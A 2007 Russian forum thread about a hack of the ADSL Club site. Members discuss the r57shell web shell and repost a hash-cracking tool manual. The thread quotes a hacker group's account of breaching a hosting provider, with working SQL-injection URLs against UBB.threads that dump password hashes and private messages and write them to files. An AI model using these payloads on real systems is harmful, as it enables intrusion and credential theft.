adsl club

Справочник

Форум

Программы

Фильмы

Ресурсы

Файлообмен

Хостинг

Ростелеком
Взломали ADSL Club
На страницу 1 2 3 4
Ответить на тему    Форум АДСЛ КлубаНАРОДНЫЕ НОВОСТИ
Автор Сообщение
Letchik
Форумчанин
СообщениеДобавлено: Ср 27-06-07 : 14-04    Заголовок сообщения: Ответить с цитатой

Хм... вы о чём?
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение  
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 14-15    Заголовок сообщения: Ответить с цитатой

один из вариантов, с помощью "кросс-сайт инъекции", на пораженный комп ставится "php shell", с помощью него получаются или расширяются права юзера, под которым зашли, тупо имя юзера прописывается в группу админов, насколько я могу судить, система там FREE BSD

Цитата:
Apache/2.2.3 (Unix) DAV/2 mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/4.4.4 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7 Server at adslclub.ru Port 80


подобные сообщения нужно отключать на уровне web server'a, для апача - это

Цитата:
# Добавить дополнительную строчку, содержащую версию сервера и имя виртуального
# хоста на страницах, сгенерированных сервером (таких, как сообщения об
# ошибках, FTP листинги директорий, выдачи модулей "mod_status" и "mod_info"
# и т.п.; документы, сгенерированные скриптами CGI, к ним не относятся).
# Установите "EMail", чтобы включить еще и линк "mailto:", направленный
# на ServerAdmin.
# Допустимые значения: On | Off | Email
#
ServerSignature On


ну а поместив юзера в группу wheel (админы), можно дальше делать что угодно. По хорошему, нужно теперь проверяться не осталось ли в системе "root kit'ов". И проводить удаленное сканирование сервера для начала XSpider'ом. Штука многими незаслуженно обхаяная, но иной раз чрезвычайно полезная. Скажу более, там где бессилен nmap, все требуху на изнанку может поднять именно Спидер. Nmap цацка сигнатурная и если у себя в базе чего не находит, строит предположения Smile. А Спайдер лезет со соим анализом во все дыры и обмануть его очень не просто.

Если у авторов сайта есть интерес к удаленной проверки различными сканерами, могу поучаствовать, главное, чтобы в хакуры не записали Smile
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 14-26    Заголовок сообщения: Ответить с цитатой

Интересно, кстати, это он пароли из md5 хэша вытягивал что ли ?
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 14-31    Заголовок сообщения: Ответить с цитатой

Richard Ferlow

нет, на сибнете они в открытом виде хранятся Smile, вероятно так легче юзерам напоминать по телефону, если они их забудут Smile
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 14-33    Заголовок сообщения: Ответить с цитатой

DrozD
Это откровенный шиндец...
дефейсер когда сие увидел, наверное от радости на стуле подпрыгнул Smile
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
alexcom
Медвед-шатун
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 14-45    Заголовок сообщения: Ответить с цитатой

Richard Ferlow писал(а):
Интересно, кстати, это он пароли из md5 хэша вытягивал что ли ?


мд5 можно только брутить насколько я знаю

зы: получив доступ к мускулу, мд5 можно и не брутить, просто сгенерировать свой хэш (с известным значением) и записать его поверх оригинального
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Отправить e-mail Посетить сайт автора Jabber ID Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 14-47    Заголовок сообщения: Ответить с цитатой

alexcom
Ну да, я знаю.
Просто удивился, когда узнал, что он на другие сайты залез с паролями узнанными
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 14-49    Заголовок сообщения: Ответить с цитатой

! Кстати, всем, кто заботится о безопасности своих серверов и для проверки как работает антивирус на файеволе, вот по ссылке http://www.securitylab.ru/software/234092.php скачайте "r57shell v1.24".

Цитата:
57shell.php - Скрипт на пхп для выполнения шелл-команд на сервере через браузер. Возможности скрипта: защита скрипта с помощью пароля, загрузка файлов на сервер, поддерживает алиасы команд, два языка интерфейса: русский, английский, возможность забиндить /bin/bash на определенный порт и другое. Возможности:

~ защита скрипта с помощью пароля
~ выполнение шелл-команд
~ загрузка файлов на сервер
~ поддерживает алиасы команд
~ включены 4 алиаса команд:
- поиск на сервере всех файлов с suid битом
- поиск на сервере всех файлов с sgid битом
- поиск на сервере файлов config.inc.php
- поиск на сервере всех директорий и файлов доступных на запись для всех
~ два языка интерфейса: русский, английский
~ возможность забиндить /bin/bash на определенный порт

Обновлено: 12 января, 2006


1. Если удалось скачать, значит у вас дырявая система мониторинга сетевой безопасности Smile. Ибо нормальный антивирус признает в этом архиве "Backdoor", каковым он собственно и является и заблокирует его.



НО это не вирус, а система удаленного управления компом, на который это файл установлен типа многим известного RAdmin.
2. После обращения по адресу, где расположен скрипт, станет ясно, что творится с безопасностью системы.

Повторюсь, этот shell не расчитан на домашних пользователей, он будет интересен тем, кто держит сервера и в первую очередь под *NIX.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 14-52    Заголовок сообщения: Ответить с цитатой

Кстати я так понимаю, что дыра была в проверки входных данных - тоесть тупо этот шелл загрузили через какую-то форму, файлоообменник тот же.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 14-57    Заголовок сообщения: Ответить с цитатой

Richard Ferlow

вполне, главное знать куда он упал, а там обратился к нему и все...
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 14-59    Заголовок сообщения: Ответить с цитатой

DrozD
Очень странно и в профессионализме разработчиков заставляет усомниться...
Про шелл не ясно - верно ли, а вот пароли - это прям вообще ахтунг.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 15-29    Заголовок сообщения: Ответить с цитатой

Richard Ferlow

зная только пароль админа от форума или админки от сайта, ничего серьезного сделать нельзя. Пароль рута не получишь, привилегии до рута не поднимишь. По любому нужен шелл.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 27-06-07 : 15-39    Заголовок сообщения: Ответить с цитатой

DrozD
Я имею ввиду, что необязательно все так просто, что залили через форму какую-то.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 17-22    Заголовок сообщения: Ответить с цитатой

выгнали с es-nso, говорят флуд развел Smile, попробую тут...

http://www.insidepro.com/eng/passwordspro.shtml

Цитата:
PasswordsPro

Внимание! Данная программа предназначена для работы только со своими собственными паролями!

Описание программы

Программа предназначена для восстановления паролей к хэшам следующих типов:

* MySQL
* MySQL5
* DES (Unix)
* MD4
* MD4 (Base64)
* MD4 (HMAC)
* MD5
* MD5 (Base64)
* MD5 (HMAC)
* MD5 (Unix)
* MD5 (APR)
* SHA-1
* SHA-1 (Base64)
* SHA-1 (HMAC)
* Domain Cached Credentials

А также к хэшам, используемых в некоторых программах на PHP:

* md5(md5($pass))
* md5(md5($pass).$salt)
* md5(md5($salt).md5($pass))
* sha1($username.$pass)

Возможности программы

* Восстановление паролей следующими методами:
- Предварительная атака;
- Атака полным перебором (включая атаку распределенным перебором);
- Атака по маске;
- Простая атака по словарям;
- Комбинированная атака по словарям;
- Гибридная атака по словарям;
- Атака по предварительно рассчитанным Rainbow-таблицам;
* Восстановление паролей длиной до 127 символов;
* Восстановление паролей к неполным хэшам всех видов;
* Редактирование хэшей пользователей;
* Поиск нужной информации в списке пользователей с хэшами;
* Быстрое добавление хэша через диалоговое окно;
* Быстрая проверка текущего пароля на всех пользователях из списка;
* Использование таблиц замены символов в простой атаке по словарям;
* Неограниченное количество словарей, используемых в атаках по словарям;
* Неограниченное количество таблиц, используемых в атаке по Rainbow-таблицам;
* Неограниченное количество загружаемых пользователей с хэшами (в лицензионной версии);

Импорт данных

Загружать хэши пользователей в программу можно следующими способами:

* Импорт из файлов формата программы PasswordsPro (*.Hashes-файлы).

* Импорт из текстовых файлов с хэшами в следующем формате:
Логин:Хэш:Salt(или HMAC-ключ):Пароль:Комментарий.
В архиве с программой находятся тестовые файлы со всеми видами поддерживаемых хэшей в этом формате.

* Через диалоговое окно.

Экспорт данных

Программа позволяет сохранять текущий список пользователей с хэшами в файлы своего внутреннего формата (*.Hashes-файлы), а также экспортировать информацию о хэшах в текстовом формате и HTML-формате.
Виды атак

Предварительная атака:

Данный вид атаки представляет собой быструю проверку хэшей пользователей на простые пароли - "123", "qwerty", "99999" и пр. а также на ранее найденные пароли, которые программа сохраняет в файле "PasswordsPro.dic".

Атака полным перебором:

Данный вид атаки представляет собой полный перебор всех возможных вариантов паролей.

Атака полным перебором также включает в себя атаку распределенным перебором. Данный вид атаки позволяет использовать для восстановления паролей несколько компьютеров, распределив между ними обрабатываемые пароли. Этот вид атаки включается автоматически, когда пользователь устанавливает количество компьютеров, участвующих в атаке, более одного. После этого становится доступной возможность выбора диапазона паролей для атаки на текущем компьютере. Таким образом, чтобы начать атаку распределенным перебором вам необходимо:

1. Запустить программу на нескольких компьютерах.
2. Выбрать во всех экземплярах программы нужное количество компьютеров для атаки.
3. Установить одинаковые настройки для перебора на всех компьютерах.
4. Выбрать для каждого компьютера свой диапазон перебора паролей.
5. Запустить на каждом компьютере атаку полным перебором.

Атака по маске:

Данный вид атаки используется, если известна какая-либо информация о пароле, например:
- Пароль начинается с комбинации символов "12345";
- Первые 4 символа пароля - цифры, остальные - латинские буквы;
- И т.д.

Для этого в настройках атаки необходимо указать маску для каждого символа в пароле, который требуется восстановить. При этом в качестве символов маски используются условные обозначения стандартных или пользовательских наборов символов - ?u, ?d, ?2 и т.д. (см. настройки программы, закладка "Наборы символов").

Простая атака по словарям:

В этом виде атаки происходит простоая проверка хэшей на пароли из текстовых файлов (словарей). Также настройки атаки позволяют использовать таблицы замены символов, с помощью которых можно заменять одни символы в паролях на другие перед их проверкой.

Комбинированная атака по словарям:

В этом види атаки проверяемые пароли формируются из нескольких слов, взятых из разных словарей, что позволяет восстанавливать сложные пароли вида "superadmin", "admin1980", "admin*admin" и др.

Гибридная атака по словарям:

Данный вид атаки, позволяет изменять пароли из словарей (к примеру, перевести пароль в верхний регистр, добавить в конце пароля символ '1' и т.д.) и проверять их в качестве паролей пользователей. Действия, применяемые к исходным паролям, называются "правилами" и их полный список приведен в файле "Rules.txt", который расположен в архиве с программой.

Атака по предварительно рассчитанным таблицам:

Данный вид атаки использует предварительно рассчитанные Rainbow-таблицы.

Инструменты программы

Программа содержит следующие инструменты:

* Генератор хэшей - предназначен для генерации хэшей всех типов, которые поддерживаются в программе.

* Генератор паролей - предназначен для генерации случайных паролей с заданными параметрами.

* Генератор словарей - предназначен для генерации словарей, содержащих пароли из заданного диапазона.

* Конвертер текста - позволяет конвертировать текст из Base64-формата в обычный текст и наоборот.

* Восстановление текста под звездочками - предназначен для восстановления текста под звездочками.

* Информация о системе - показывает различную системную информацию.

Параметры командной строки

Программа поддерживает следующие параметры командной строки:

* /config:filename - позволяет программе использовать настройки из файла "filename", а не из файла PasswordsPro.ini.

* /auto - переводит программу в режим, при котором она автоматически запускает текущую атаку, а при окончании атаки программа автоматически завершает свою работу.

Эти параметры позволяют автоматизировать работу программы, используя командные BAT-файлы. Для этого нужно сделать следующее:

1. Создать несколько INI-файлов с различными названиями для разных видов атак.
2. Создать BAT-файл, к примеру, следующего содержания (в Windows 2000/XP):
PasswordsPro.exe /auto /config:Preliminary.ini
start /w PasswordsPro.exe /auto /config:DictSimple.ini
start /w PasswordsPro.exe /auto /config:DictHybrid.ini
start /w PasswordsPro.exe /auto /config:BruteLatin.ini
start /w PasswordsPro.exe /auto /config:BruteNumber.ini
и т.д.
3. Запустить созданный BAT-файл на исполнение.
4. Примечание: в этом режиме программа не выдает никаких сообщений (ни об окончании атаки, ни о возникающих ошибках), а принудительная остановка текущей атаки приводит к закрытию программы и переходу к следующей атаке (т.е. к следующей строке BAT-файла).

Статус программы

Программа PasswordsPro имеет статус Shareware.
Стоимость одной лицензии - 500 рублей.

С вариантами оплаты лицензионного ключа вы можете ознакомиться здесь.

После оплаты вам необходимо отправить в Службу поддержки следующие данные:
- Информацию о платеже (обязательная информация);
- Ваше имя и фамилию (обязательная информация);
- Дополнительную информацию для регистрации - например, название вашей компании и т.п. (необязательная информация).

После этого вы получаете:
- Лицензионный ключ, позволяющий использовать без ограничений текущую и все последующие версии программы;
- Квалифицированную техническую поддержку по использованию программы, включая поддержку On-line (по ICQ).
Ограничения Demo-версии

1. Максимальное количество загружаемых пользователей с хэшами: 1.

Лицензионное соглашение

1. Все права на программу PasswordsPro принадлежат автору проекта InsidePro.

2. Программа распространяется в виде Demo-версии, которую Вы можете использовать с учетом имеющихся ограничений неограниченно долго. Также Вы без уведомления автора можете размещать и распространять неизмененный дистрибутив Demo-версии программы на каких-либо носителях информации (жесткий диск, дискета, CD-ROM и т.д.).

3. Для использования программы без ограничений Вам необходимо зарегистрировать свою копию программы, оплатив стоимость лицензионного ключа (или нескольких лицензионных ключей).

4. Использование лицензионных ключей лицами, не являющимися зарегистрированными пользователями программы, а также распространение и публикация лицензионных ключей к программе являются незаконными действиями. Автор программы оставляет за собой право лишать статуса зарегистрированного пользователя владельцев этих лицензионных ключей и блокировать такие лицензионные ключи в последующих версиях программы.

5. Вы не можете модифицировать, дизассемблировать и декомпилировать данную программу. Нарушение любого из этих требований ведет к автоматическому прекращению действия этого лицензионного соглашения.

6. Программа распространяется по принципу "как есть" ("AS IS"). Вы используете программу на собственный риск. Автор не несет ответственности за потерю данных, повреждения, упущенную прибыль или иной ущерб, полученный при использовании или неиспользовании Вами этой программы.

7. Автор гарантирует, что программа не содержит в себе вредоносного, шпионского или иного кода, предназначенного для выполнения других функций, кроме оговоренных в описании программы.

8. Использование программы означает принятие Вами данного лицензионного соглашения.

9. Если Вы не согласны с условиями данного лицензионного соглашения, пожалуйста, удалите файлы программы с Вашего компьютера и прекратите использование программы.

FAQ

Q1: У меня есть хэш "XXXYYYZZZ". Какой у него тип (т.е. алгоритм хэширования)?
A: 1) Ниже перечислены некоторые типы хэшей, пароли к которым можно восстановить с помощью программы PasswordsPro (или с помощью других программ):
• если хэш начинается с сигнатуры "$1$", то обычно это MD5 (Unix) хэш.
• если хэш начинается с сигнатуры "$apr1$", то обычно это MD5 (APR) хэш.
• если хэш имеет длину 8 байт, то это может быть MySQL-хэш или любой более длинный хэш, "урезанный" до длины 8 байт - например, MD5-хэш.
• длину 16 байт обычно имеют следующие типы хэшей:
- MD4, MD5 и другие хэши;
- некоторые SALT'овые хэши, например, md5(md5($pass).$salt);
- некоторые составные хэши, например, md5(md5($pass)) и др.
• если хэш имеет длину 20 байт, то это может быть SHA-1 или MySQL5-хэш.

2) Если тип хэша неизвестен, то нужно узнать - какой алгоритм применяется в программе, из которой хэш был извлечен. Например, можно проанализировать исходные тексты PHP-скрипта, в котором используется этот хэш.

3) Всегда можно увидеть, как выглядит тот или иной хэш, используя сервис Генератор хэшей, где представлено более 90 видов хэшей.

4) Иногда хэш может быть в Base64-кодировке и для его анализа хэш лучше преобразовать в более удобный 16-ричный вид. Для этого также можно использовать вышеупомянутый сервис или соответствующий инструмент в программе.

Q2: Если я могу быстро вычислить хэш от своего пароля, то почему я не могу быстро сделать обратную операцию - вычислить пароль на основе хэша?
A: Любой алгоритм хэширования фактически представляет собой подсчет контрольной суммы от исходного текста. При этом используются необратимые математические операции над исходным сообщением, такие как AND и др. Например, даже если в выражении "X AND Y = Z" мы знаем Y и Z, то мы никогда не сможем по ним точно восстановить исходное значение X (максимум, что мы можем - это рассчитать область возможных значений X, удовлетворяющих данному равенству). Это одна из причин, почему обратное преобразование "хэш -> пароль" невозможно (теоретически, можно лишь рассчитать область возможных исходных паролей, но на практике это нереальная задача). Вторая же причина, почему невозможно абсолютно точно вычислить исходный пароль на основе хэша - это коллизии.

Q3: Что такое коллизии?
A: Так как область выходных значений (всевозможных хэшей) в любом алгоритме хэширования является величиной конечной и определяется размером хэша (к примеру, для алгоритма MD5 количество возможных хэшей составляет 2128 или 3.4*1038 вариантов), а количество входных значений (исходных сообщений) - величина бесконечная, то само собой существуют такие исходные сообщения, которым соответствует один и тот же хэш. Такие исходные сообщения и называются коллизиями.

Q4: Что такое SALT и SALT-овые хэши?
A: SALT (или так называемая "привязка") в основном используется для того. чтобы пользователи, использущие одинаковые пароли, имели различные хэши. Как правило, SALT - это строка из 3...8 случайных символов, которая дополнительно используется для хэширования паролей пользователей и сохраняется вместе с финальным хэшем (как, к примеру, сделано в MD5 (Unix)-хэшах) или же хранится отдельно от хэша.

Q5: Почему у SALT'овых хэшей низкая скорость перебора?
A: В крайне упрощенном виде перебор паролей к обычным (не-SALT'овым) хэшам происходит так - однократно подсчитывается хэш от текущего пароля, а затем хэш многократно сравнивается со всеми перебираемыми хэшами. При восстановлении же паролей к SALT'овым хэшам текущий пароль приходится хэшировать отдельно для каждого пользователя, т.к. у них разные SALT'ы. Само собой, скорость любой атаки при этом будет снижена пропорционально количеству пользователей.

Q6: Почему у MD5 (Unix) и MD5 (APR) хэшей низкая скорость перебора?
A: Это связано с тем, что помимо использования SALT'ов, эти хэши формируются в цикле на 1000 итераций, в каждой из которых вызывается от 2 до 4 обычных MD5-преобразований. В результате скорость атаки для таких хэшей в тысячи раз ниже по сравнению с обычными MD5-хэшами.

Q7: Где используются хэши, имеющие в PasswordsPro суффикс [PHP]?
A: Суффикс [PHP] указывает на то, что эти алгоритмы по своему синтаксису соответствуют PHP-коду, в котором они обычно и применяются:
md5(md5($pass)) [PHP] - используется в форуме e107.
md5(md5($pass).$salt) [PHP] - используется в форуме vBulletin 3.x.x.
md5(md5($salt).md5($pass)) [PHP] - используется в форуме IPB 2.x.x.
sha1($username.$pass) [PHP] - используется в форуме SMF 1.1.x.

Q8: Что такое "словари" и где их взять?
A: Словарь - это текстовый файл, в котором находятся возможные пароли пользователей (одна строка файла - один пароль). Это могут быть как часто употребляемые пароли ("admin", "master" и др.) так и пароли из нужного диапазона символов ("1111" - "9999"), которые можно сгенерировать инструментом "Генератор словарей".
На данной странице вы всегда можете найти несколько десятков мегабайт подобных словарей.

Q9: "Таблицы замены символов" в простой атаке по словарям - что это такое?
A: Данные таблицы (*.KBT-файлы) представляют собой текстовые файлы, в которых можно указать - какие символы проверяемых паролей должны быть заменены на другие символы. Эта возможность обычно требуется пользователям из не-англоязычных стран, имеющих на клавиатуре 2 раскладки символов - английскую и свою национальную. В этом случае пароли на своем языке могут быть набраны в английской раскладке клавиатуры и наоборот - английские слова набраны национальными символами. В архиве с программой находится файл "Russian.kbt", в котором представлены такие таблицы для пользователей с русской раскладкой клавиатуры.

Q10: В каком порядке рекомендуется восстанавливать пароли к хэшам пользователей?
A: Восстанавливать пароли к хэшам рекомендуется в следующем порядке:
- предварительная атака;
- простая атака по словарям (с большим количеством словарей);
- гибридная атака по словарям (с небольшим количеством словарей);
- комбинированная атака по словарям;
- атака полным перебором с алфавитом "0...9" на глубину 8-9 символов;
- атака полным перебором с алфавитом "a...z" на глубину 7-8 символов;
- атака полным перебором со всеми доступными алфавитами на глубину 4-6 символов;
- атака полным перебором с алфавитами "0...9" и "a...z" на глубину 7-8 символов.
- и т.д.
Разумеется, при наличии Rainbow-таблиц, нужно использовать атаку по этим таблицам.
Также, если есть какая-либо информация о пароле, необходимо использовать атаку по маске.

Q11: Как использовать пользовательские наборы символов?
A: Пользовательские наборы символов обычно используются в атаке по маске. Т.e. если вы знаете, к примеру, что первые 5 символов пароля - цифры или заглавные латинские символы, то вы можете в поле "?4:" ввести строку "?d?u" (или же ввести нужный алфавит полностью: "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"), а затем в маске описать первые 5 символов пароля так - ?4?4?4?4?4.

Q12: Я хотел бы перевести интерфейс программы на свой национальный язык. Как это сделать?
A: Вы можете перевести интерфейс к программе на свой язык, но поддержку и обновление своего LNG-файла вам придется делать самостоятельно через форум на сайте программы. Для этого:
- посетите форум программы PasswordsPro - возможно, интерфейс программы на ваш язык уже переведен;
- в настройках программы сгенерируйте файл "English.lng" (или "Russian.lng") и переведите его на свой язык;
- разместите новый LNG-файл на своем сайте, FTP-сервере или же на одном из многих файловых серверов в интернете;
- создайте на форуме программы новую тему, в которой разместите ссылку на этот LNG-файл.
По мере выхода новых версий программы (о которых можно узнать, подписавшись на рассылку новостей проекта InsidePro) вам необходимо будет своевременно вносить изменения в свой LNG-файл и обновлять ссылку на него на форуме программы.
Разумеется, за перевод интерфейса возможно бесплатное получение лицензионного ключа к программе.

Q13: Что такое Rainbow-таблицы и как их использовать для восстановления паролей?
A: Подробную информацию о Rainbow-таблицах можно прочитать здесь. Для генерации таблиц можно использовать программы rtgen или Winrtgen. Для восстановления паролей необходимо загрузить в программу список *.RT-файлов, содержащих Rainbow-таблицы и выбрать атаку по таблицам. Разумеется, тип хэшей в таблицах должен совпадать с типом хэшей, выбранных для атаки. Для этого файлы с таблицами должны называться следующим образом:
"md4_*.rt" для MD4 и MD4 (Base64) хэшей,
"md5_*.rt" для MD5 и MD5 (Base64) хэшей,
"sha1_*.rt" для SHA-1 и SHA-1 (Base64) хэшей,
"mysql323_*.rt" для MySQL-хэшей (генерируются программой Winrtgen),
"mysqlsha1_*.rt" для MySQL5-хэшей (генерируются программой Winrtgen).

Q14: Я импортирую в программу список хэшей с SALT'ами, в которых есть символ ':' и программа неправильно разделяет поля в строках с исходными данными. Как загрузить в программу такие строки с хэшами?
A: Специально для таких ситуаций в настройках программы можно изменять символ, который будет использоваться для разделения полей в строках с хэшами пользователей (по умолчанию используется символ ':'). Также вы можете изменять символ для разделения полей, используемый и для экспорта хэшей в текстовом виде.

Q15: При атаках по словарям программа выдает сообщение, что атака закончена, хотя словарь был обработан не полностью. Почему?
A: Это связано с тем, что в словарях имеются служебные символы, некоторые из которых программа интерпретирует как конец файла (EOF) и заканчивает работу со словарем (например, символ 0x1F, который появляется в файле после объединения нескольких файлов в один DOS-командой COPY). Поэтому используемые словари рекомендуется очистить от таких символов, а также от символов табуляции, пустых строк и т.д.
Примечание: для сортировки словарей, а также для удаления из них пустых строк и повторяющихся паролей вы можете использовать инструмент "Генератор словарей".

Q16: При атаке по Rainbow-таблицам возникает сообщение "Can't open charset configuration file!" и атака заканчивается. Что это за файл, где его взять и зачем он нужен?
A: Это файл с наборами символов (например - "alpha" (A...Z), "numeric" (0...9) и др.), которые используются для генерации Rainbow-таблиц, а также для восстановления паролей по этим таблицам, В архиве с программой находится файл "Charset.txt", который содержит 25 часто используемых наборов символов, но, разумеется, вы всегда можете дополнить его своими собственными наборами.


http://www.xakep.ru/post/24136/default.asp

Цитата:
Уже как несколько месяцев весь рунет стоит на ушах из-за того, что один из самый известных русских хостеров (valuehost) был взломан. Сейчас я вам расскажу как всё было... Всё произошло примерно пол года назад. Как-то в один прекрасный день мы узнали, что один из мемберов нашей тимы (w00t) нашёл уязвимость в форуме UBB.threads 6.2.*-6.3.*. Это была обычная инъекция, которой за считанные секунды можно было получить хеши всех администраторов и пользователей форума.

Вот и сама уязвимость, которая принесла большие траблы админам валуе =) (Все респекты Вут'у =)): (багу мы выкладывали на паре известных форумов, но это была самая грубая ошибка, некоторые личности ей и увели базу, что привело к масс дефейсу известных русских сайтов и раздаче базы "кому попало").

http://urlubb.com/showmembers.php?Cat=&like= 1'%20union%20SELECT%20U_LoginName,U_Registered, U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_ Number%20FROM%20w3t_Users%20WHERE% 20U_Status='Administrator'/*

После того, как мы увидели хеши админов форума в кодировке MD5, в дело пошёл обычный брутфорсер - MD5 Inside. Оказалось, что админы зачем-то зарегали 5 админов, причём появлялись на форуме максимум 1-2. Ещё они не дружат со сложными пассами Smile За час мы расшифровали парочку админских пассов (помнится мне, что у одного был пароль 1234567890 %). По началу казалось, что это ничего не даст, так как админы таких крупных хостеров не ламоразмы и прав на запись не оставляют, но эти оказались особыми Smile Права на запись смайлов были не прикрыты /images/icons/. В результате в админке форума был залит php шелл через смайлик. Как вы понимаете, валуехост оставалось недолго жить на свете... =)

Пару ночей мы рылись в исходниках и изучали прелести валуехоста Smile В конфиге достали пароль от главной базы. Далее залили на валуе скрипт для просмотра БД и спокойно вошли в неё. Там нас ожидало очень много интересного. FTP пассы в открытом виде, инфа владельцев доменов и разная прочая фигня лежала в огромной базе с 60.000 сайтами.

Прошло полгода, доступ к базе был у нас до сих пор! Некоторые личности приобретшие базу начали раздавать её и появлялось множество якобы "дефейсов" кульных сайтов. Поступало много звонков к админам, что вот их отымели, но сперва они думали, что это полный бред и отвечали по телефону: "Взлом нашего сервера невозможен, это исключено".

Как-то раз после учёбы вечерком сожусь за комп и от одного из мемберов узнаю, что админы вышли из долгой спячки (которая длилась пол года) и поприкрывали всё нахрен. Лично я был немного рад, что наконец-то прекратятся эти бесконечные "дефейсы", но всё равно в душе было немного жалко потерять доступ к такой огромной БД Wink. И тут мы разгорелись желанием всё-таки вернуть эту базу, не для дефейсов, не для продажи, а для интереса. Valuehost были как всегда на высоте в своей тупизне ). Инъекцию на форуме они не прикрыли, а просто снесли все наши "потайные ходы (шеллы, нужные инструменты =))и убрали права на запись в /icons/...

После двух часов расшифровки очередных админских хешей форума мы нашли ещё одного "любителя маленьких паролей". Очередной раз мы в админке, через смайл шелл залить нельзя, пишет права нету у тебя, тут в админке UBB я нашёл ещё одну мазу - добавлять стили или редактировать их. Админы прикрыли права на /icons/, а /stylesheets/ прикрыть они не догадались (просто добавлять или редактировать стили форума и делать шелл). После 15 минут смеха мы опять каким-то макаром лазали по базе как по своей Smile...

Но не всё так радостно. Через несколько дней все наши шеллы поприкрывали и самое главное - их форум UBB был снесён окончательно. ИМХО главный директор ВалуеХост открыл глаза и выгнал этих недоумков с работы, нанял умных людей. Пусть это служит уроком для администраторов серваков, которые любят поставить на свой ресурс что-то публичное вместо того, что бы посидеть и написать свой двиг, чьи сорцы будут никому неизвестны Smile. Ну а насчёт паролей тут уже говорить нечего, ставить на такой умопомрачительный хостер 5-значный пасс просто ЛОЛ...

Ну а вот все уязвимости UBB.threads 6.2.*-6.3.* найденными нами (Cyber Lords Team):

1. Выводим логины и хеши паролей всех юзеров...

http://forum.ru/showmembers.php?Cat=&like= 1'%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users/*
http://forum.ru/showmembers.php?Cat=&like= 1'%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users where U_Status='Administrator'/*

Выводим пассы всех админов... Заменяем Administrator на Moderator и получаем тоже тока для модеров....

2. Читаем чужие приваты...

http://forum.ru/viewmessage.php?Cat=&message= 1%20or%201=1%20and%20t1.M_Number= ТУТ ПИШЕМ НОМЕР ПРИВАТА КОТОРЫЙ ХОТИМ ПОЧИТАТЬ/*

Например:

http://forum.ru/viewmessage.php?Cat=&message= 1%20or%201=1%20and%20t1.M_Number=3/*

3. Пишем все логины с паролями в файл на серваке:

http://forum.ru/viewmessage.php?Cat=&message= 999999999%20union%20select%20U_LoginName, 0,0,0,0,U_Password%20from%20w3t_Users% 20where%201=1%20into%20outfile%20'/ПУТЬ ДО ФОРУМА/images/icons/info.txt'/*

Путь можно узнать так: http://31337.org/showmembers.php?Cat=&like=0' - вылезет ошибка и там видно путь...

4. Получаем список логинов всех юзеров..

http://forum.ru/showflat.php?Cat=&Number =999999%20union%20select%200,U_Login Name%20from%20w3t_Users%20where%2 01=1%20into%20outfile%20' /var/www/html/forum/images/icons/info1.txt'

Меняем U_LoginName на U_Password, info1.txt на info2.txt и в файле info2.txt получаем пасы всех юзеров... Примерно так:

http://forum.ru/images/icons/info2.txt

P.S. Иногда надо регаться чтобы бага прокатила, а иногда не надо... Всё зависит от настроек форума..

We are: Condor, k0pa, w00t, _SPiRiT_, Xterm, DiorR..

http://www.cyberlords.net
irc.phey.net


вот и получается надо проверять сканерами безопасности возможные дыры и закрывать поскорее.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
cryimer
Эксперт
СообщениеДобавлено: Ср 27-06-07 : 17-39    Заголовок сообщения: Ответить с цитатой

DrozD
А ты походу неплохо шариш в этих делах.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Daniil
Начинающий
СообщениеДобавлено: Ср 27-06-07 : 17-54    Заголовок сообщения: Ответить с цитатой

DrozD

Хватит народ пугать...

1. 57shell.php - это всего лишь шел, который сначала надо залить на сервер, а потом уже выполнить. А чтоб его залить нужна дыра.

2. Нормальный пароль сложно подобрать.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение  
DrozD
Гуру
СообщениеДобавлено: Ср 27-06-07 : 17-57    Заголовок сообщения: Ответить с цитатой

cryimer

